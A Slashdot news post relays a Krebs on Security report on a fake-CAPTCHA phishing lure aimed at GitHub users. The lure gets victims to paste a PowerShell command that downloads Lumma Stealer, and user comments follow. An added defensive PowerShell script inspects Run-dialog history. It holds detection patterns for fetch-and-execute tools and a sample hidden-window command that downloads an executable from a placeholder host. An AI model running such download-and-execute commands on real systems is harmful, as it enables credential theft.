
Windows PowerShell Phish Uses Fake CAPTCHA, Downloads Credential Stealer (krebsonsecurity.com) 62

"Many GitHub users this week received a novel phishing email warning of critical security holes in their code," reports Krebs on Security — citing an email shared by one of his readers: "Hey there! We have detected a security vulnerability in your repository. Please contact us at https://github-scanner[.]com to get more information on how to fix this issue...." Clicking the "I'm not a robot" button generates a pop-up message asking the user to take three sequential steps to prove their humanity. Step 1 involves simultaneously pressing the keyboard key with the Windows icon and the letter "R," which opens a Windows "Run" prompt that will execute any specified program that is already installed on the system.

Step 2 asks the user to press the "CTRL" key and the letter "V" at the same time, which pastes malicious code from the site's virtual clipboard. Step 3 — pressing the "Enter" key — causes Windows to launch a PowerShell command, and then fetch and execute a malicious file from github-scanner[.]com called "l6e.exe...." According to an analysis at the malware scanning service Virustotal.com, the malicious file downloaded by the pasted text is called Lumma Stealer, and it's designed to snarf any credentials stored on the victim's PC.

Even though this might fool some users, Krebs points out that Microsoft "strongly advises against nixing PowerShell because some core system processes and tasks may not function properly without it. What's more, doing so requires tinkering with sensitive settings in the Windows registry..."

Thanks to long-time Slashdot reader sinij for sharing the article.
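
The lure above depends on the victim pasting a command into the Windows "Run" prompt, and Windows keeps a per-user history of Run entries in the RunMRU registry key. The following is an added triage example, not code from the Krebs article or from any commenter; the function names and the matching heuristics are assumptions made for illustration, and the sample entries are constructed.

```powershell
# Added example: review Run-dialog (Win+R) history for pasted fetch-and-run commands.
# Each RunMRU value (a, b, c, ...) stores one command followed by a "\1" marker;
# the MRUList value gives the order, newest first.
$RunMru = 'HKCU:\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU'

# Heuristics below are assumptions for this example, not a vendor rule set.
$Interpreter = '(?i)\b(powershell|pwsh|cmd|mshta)(\.exe)?\b'
$RemoteUrl   = '(?i)https?://\S+'
$FetchVerb   = '(?i)\b(iwr|irm|iex|curl|wget|Invoke-WebRequest|Invoke-RestMethod|Invoke-Expression|DownloadString|DownloadFile)\b'

function Test-RunEntry {
    param([Parameter(Mandatory)][string]$Command)
    $clean = $Command -replace '\\1$', ''      # strip the MRU terminator
    $hits = @()
    if ($clean -match $Interpreter) { $hits += 'interpreter' }
    if ($clean -match $RemoteUrl)   { $hits += 'remote-url' }
    if ($clean -match $FetchVerb)   { $hits += 'fetch-or-exec' }
    [pscustomobject]@{
        Command    = $clean
        Indicators = $hits -join ','
        # A bare "cmd" is normal; an interpreter plus a URL or fetch verb is not.
        Suspicious = ($hits -contains 'interpreter') -and ($hits.Count -ge 2)
    }
}

function Get-RunHistory {
    if (-not (Test-Path $RunMru)) { return }
    $key = Get-ItemProperty -Path $RunMru
    foreach ($letter in ([string]$key.MRUList).ToCharArray()) {
        $value = $key."$letter"
        if ($value) { $value }
    }
}

# Constructed sample entries in RunMRU storage form (not taken from the campaign).
$samples = @(
    'notepad\1',
    'cmd\1',
    'powershell -w hidden -c "iwr https://example.invalid/x.exe -OutFile x.exe"\1'
)

$entries = @($samples) + @(Get-RunHistory)
$entries | ForEach-Object { Test-RunEntry -Command $_ } |
    Where-Object Suspicious | Format-List Command, Indicators
```

Of the three constructed samples only the last is flagged; on a Windows host the current user's real Run history is checked as well.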
  • by DesertNomad ( 885798 ) on Sunday September 22, 2024 @06:33PM (#64808517)

    OMG. Here user, here's the instructions to let me hack your computer.

    • by gweihir ( 88907 )

      Being clueless comes with increased risk in life. This applies to small and big things.

      • The problem is cluelessness isn't entirely what's involved.

        Nowadays a lot of modern Captchas ask absolutely trivial tasks ("align the puzzle piece to the image") and don't rely on successful completion of the task, but on subtle timing of the inputs.

        It would be trivial to solve the task itself in a 1-liner in Perl (or in Python for modern kids, but with more spaces), but the sudden jumps and smooth linear motion of the pointer would be going through a classifier that would notice the synthetic origin of th

    • OMG. Here user, here's the instructions to let me hack your computer.

      Well you say OMG, but the reality is this is how the vast majority of hacks occur right now. Oh look my phone is ringing Microsoft support called me about a virus on my computer, this is important, brb.

    • A darwinian attack...
    • I'm sorry, but fools who fall for this have no business being on GitHub at all.

  • ... GitHub users ...

    If you're not smart enough to recognize an 'execute' command, you're not smart enough to own a GitHub account.

    With the Linux UI now being Windows-like, does this work (assuming PowerShell for Linux is installed)?

    • by Bert64 ( 520050 )

      You wouldn't need powershell, the same thing could be achieved in bash on linux just as easily. The difference is that linux users are on average more tech savvy and wouldn't fall for it.

      What it really shows is that neither windows nor linux are suitable systems for such users, and they would be better off with a walled garden system like ios or chromeos.

      • by unrtst ( 777550 )

        What it really shows is that neither windows nor linux are suitable systems for such users, and they would be better off with a walled garden system like ios or chromeos.

        ... because you can't open a terminal on either of those??? <HINT - you can>

    • by rta ( 559125 )

      not a windows dev, but I think i fell for a joke Ctrl-W once, and almost for an Alt+F4. It's one of those things that if you haven't encountered and if it hits you when you're not paying full attention or something, i think it can get you. especially since Ctrl-V since prob many people don't even think "Ctrl-V" for paste ... they think "paste".

      Nowadays i think there should prob. be more default indication of what's in the clipboard / when the clipboard content changes. (although there is some sens

      • ... sensitivity about passwords ...

        I'd recommend Ditto [github.com] clipboard manager but it's Windows-only. It is open-source, so a Linux dev. could port it, if one wanted. ;)

        ... the android one ...

        I found so-called clipboard managers to be snippet managers / keyboard macros. That is, one has to move data in and out of a database, not re-use/replace the data in the clipboard. I am interested in an Android applet that changes the clipboard contents, similar to Ditto [sourceforge.io] (official web-page).

  • by gweihir ( 88907 ) on Sunday September 22, 2024 @06:59PM (#64808547)

    These people are not very smart, after all. That apparently some want to remove PowerShell as a "countermeasure" just makes this even more obvious.

    • by Bert64 ( 520050 )

      That's the typical clueless kneejerk response, block/remove something useful instead of learning how to use it properly.

    • The average Windows *user* yeah maybe. Average developer? Come on. Us Windows devs are experts on copy/pasting!
    • by Entrope ( 68843 )

      You laugh, but the Australian Information Security manual wants systems to remove "script execution engines" from all unprivileged users -- including both PowerShell and the more traditional command prompt, which Slashdot/Cloudflare will not let me name, as specific examples (control ISM-1491).

      • by gweihir ( 88907 )

        Well, MS Office is basically a giant scripting engine. So is basically any web-browser. I guess somebody wasted money on "experts" there.

        • by Entrope ( 68843 )

          There are a bunch of security controls in the Australian ISM about the scripting engines inside Microsoft Office and about "active content" from the web, in addition to the one I mentioned.

          When you assume, you make an ass out of yourself, at least.

      • Australian Information Security manual wants systems to remove "script execution engines" from all unprivileged users.

        I had a crappy sales job long ago with a locked down Windows NT workstation, limited icons, and permissions. I pulled up Internet Exploder and typed cmd into the address bar, much hilarity ensued. Don't know if they could have locked out the net command too, but they hadn't. The RDP used didn't like a full screen cmd window so it didn't register, probably why MS killed full screen later on. Maybe they could kill the shell but I doubt it.

  • Idiots (Score:5, Funny)

    by lsllll ( 830002 ) on Sunday September 22, 2024 @07:08PM (#64808565)

    Why was removing PowerShell even suggested? Why not just give instructions to remove the web browser and the email client? Problem solved!

  • Every system should have implemented mandatory access controls to mitigate this type of thing by now. It shouldn't be that easy to get at the private data of end users without them knowing what application is requesting access, and them directly approving said access.

    Android, iOS, ChromeOS and even macOS got this right by providing cryptographically immutable base systems with the majority of running processes forbidden from touching users' private data by default. Executing malware on these systems is no
    • by lsllll ( 830002 ) on Sunday September 22, 2024 @07:28PM (#64808577)

      Every system should have implemented mandatory access controls to mitigate this type of thing by now.

      It's not about access control. Both Windows and Linux try to separate administrative access from user access and for those who know the difference and how to use them, they pretty much work. But you gotta realize that a user must have access to their local directory, should be able to download files, and be able to execute them. If you don't allow them to do that, then you're not going to be considered a "user-friendly" O/S.

      It shouldn't be that easy to get at the private data of end users without them knowing what application is requesting access, and them directly approving said access.

      If a user is dumb enough to follow instructions as introduced by this hack, they surely are going to just answer "Yes" to any prompt that pops up.

      Android, iOS, ChromeOS and even macOS got this right by providing cryptographically immutable base systems with the majority of running processes forbidden from touching users' private data by default.

      I suppose that's reasonable for self-contained applications, like those on the OSes you mentioned. But on the PC we tend to run many things which fall outside of that realm. Case in point, on the PC there's an application called Minion which doesn't really have its own data, but its purpose is to supplement other applications by allowing you to download plugins for them. And that's just one of the applications I use that are on my menu bar. Treating Windows or Linux like Android and iOS really does them a disservice.

      Disclaimer: I am not a macOS user, so I really don't know how that handles this scenario.

      • by Jeremi ( 14640 )

        a user must have access to their local directory, should be able to download files, and be able to execute them.

        The problem (not only for naive users, but for all users) is how to know whether the executable they are downloading and executing will do what they expect vs something malicious?

        Sure, in a scenario like this it is easy to scoff and say that the user should have picked up on the obvious clues, but it's not difficult to imagine a scenario where the methods for convincing the user to install and execute a malicious executable are sophisticated enough to fool even the most knowledgeable user. For example, one

        • by lsllll ( 830002 )

          You touched on 2 attack vectors. One is software from people you don't trust. For that, you're truly taking your chances, because you don't know if it'll take your document directory and upload it to some place. Heck, it even can be ransomware. But, in general, if it's from a place you trust, you tend to run it anyway. The solution to this is checksums, like those for various Linux distributions, and code signed by an authority you trust. The other scenario is you download something from a place you t

          • To answer the question regarding software which isn't self-contained, yes, software can have plugins and it can be rigged up to supply plugins to other software products if the developer wishes to allow it, and doing so generally won't affect the security of everything else which doesn't permit it. Also, users can access their local and network files/folders without restrictions using a file manager as GUI apps are isolated from one another.

            Regarding the trusted-but-compromised scenario, even if the deve
      • I would say that the PC is an "open" platform while iPhone is a "closed" platform, with other platforms being in various places on the scale between the two.

        The more "open" a platform is the more things a user can do with it, which opens up more risk to an uneducated user being exploited through social engineering, and there's nothing developers can do to mitigate this without compromising the openness of the platform. Either the user should move to a more limited closed platform for their own safety, givi

      • by Bert64 ( 520050 )

        should be able to download files, and be able to execute them

        On a general purpose OS aimed at geeks sure, on a consumer device no they shouldn't at least not by default.

        • You are confusing consumer device with appliance. Just because something is targeted at a consumer doesn't make it a locked down appliance.

          Imagine your car not allowing you to drive down a certain road because the destination you want to go to is not on the approved list that General Motors has defined. Consumers, non-geeks, absolutely need to be able to download, execute and install things on their PCs. It is what makes them a PC instead of a kiosk.

          • by Bert64 ( 520050 )

            Regular consumers don't open the hood of their car and change the air filters, despite it being a pretty easy job, and they certainly aren't going to try changing the brake pads on their own because messing that up could easily kill them (or someone else).
            They pay someone else to do these things for them.

            Regular consumers don't buy a collection of parts and assemble their own car to their own specifications, but there is a niche of people who will absolutely do that.

            A general purpose computer is not a suita

      • by bento ( 19178 )
        Out of curiosity what is Minion and where does it come from?
  • Why would websites be allowed to put stuff into the paste buffer?

    • by CaptQuark ( 2706165 ) on Monday September 23, 2024 @01:39AM (#64808915)

      Why would websites be allowed to put stuff into the paste buffer?

      Lots of websites place helpful information in the paste buffer.
          Go to YouTube and click on the Share button. The shortened URL of the video will be placed in your copy buffer.
          Go to Programiz for tutorials. Click the Copy button and the example code will be placed in your buffer.

      Some sites disable normal copying but provide a "copy to clipboard" option, then they add their citation to the bottom of the copied text to help you give proper attribution to the source. There are other examples but this should be enough to see that not all clipboard interactions are for nefarious purposes.

      • Lots of websites place helpful information in the paste buffer.

        Yep. Like "Copy Coupon Code". "Copy One-Time Code" (for use elsewhere). There are countless legit applications of this.

        • Yep. Like "Copy Coupon Code". "Copy One-Time Code" (for use elsewhere). There are countless legit applications of this.

          Why not simply let the user copy this information the normal way? Hardly legit given the huge potential for abuse, and given the trend that more and more applications nowadays tend to no longer make it obvious when they have lost the selection.

          • by nazrhyn ( 906126 )
            My intuition says that the number of people who already fell for this would not be reduced significantly by the prompt saying "copy this text and paste it" ... it's already semi-insane that this worked on people who use GitHub...
    • Sigh... Ok, I see that now, and the fact that this is abusable makes me say - as I do far too often these days - "This is why we can't have nice things".

  • Subject says it all.

  • Humans have checkbooks. Send me a check ...
  • What the fuck? I was just blocked from posting this comment [pastebin.com]... It's always nice when your cloud security makes your site unusable.

    Why have I been blocked?

    This website is using a security service to protect itself from online attacks. The action you just performed triggered the security solution. There are several actions that could trigger this block including submitting a certain word or phrase, a SQL command or malformed data.
    What can I do to resolve this?

    You can email the site owner to let them know you

    • Welcome to the club of the annoyed by Cloudflare.

      This is the price one pays for browsing the Sh!tternet these days, I guess ..

  • by EvilSS ( 557649 ) on Monday September 23, 2024 @08:53AM (#64809447)
    I suspect for anyone who falls for this that there actually is a pretty good chance there are security vulnerabilities in their code on github.
  • How do the bad guys always know which powershell commands work in all versions of powershell? I can't seem to ever figure out a way to ACTUALLY do anything in powershell because of how wacky it is.
